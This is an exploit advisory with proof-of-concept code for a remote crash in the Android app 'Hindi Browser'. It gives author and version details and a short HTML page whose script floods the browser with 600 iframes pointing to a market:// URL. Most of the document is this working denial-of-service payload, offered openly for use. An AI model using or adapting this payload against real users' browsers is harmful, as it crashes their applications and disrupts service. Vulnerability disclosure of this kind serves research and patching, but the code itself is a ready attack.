Hindi browser version 1.0 remote crash exploit.
54eb52bf78034abac4de64902bbf8a20618f3f01cc39821133532bc33733e6fa
# Exploit Title: Hindi Browser Remote Crash Exploit
# Date: 06/01/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
#Download Link: https://play.google.com/store/apps/details?id=com.hb&feature=search_result#?t=W251bGwsMSwxLDEsImNvbS5oYiJd
# Version: 1.2
# Category:Remote
# Tested On : Android 4.1.2
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Poc :-http://www.youtube.com/watch?v=nX0IveByeiw&feature=youtu.be
Code :-
#########################################
<html>
<body>
<script type="text/javascript">
var m_frame = "";
for(var i = 0; i < 600; i++)
{
m_frame = document.createElement("iframe");
m_frame.setAttribute("src", "market://a");
document.body.appendChild(m_frame);
}
</script>
</body>
</html>
###########################################
Regard's
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website:Gurunsb.com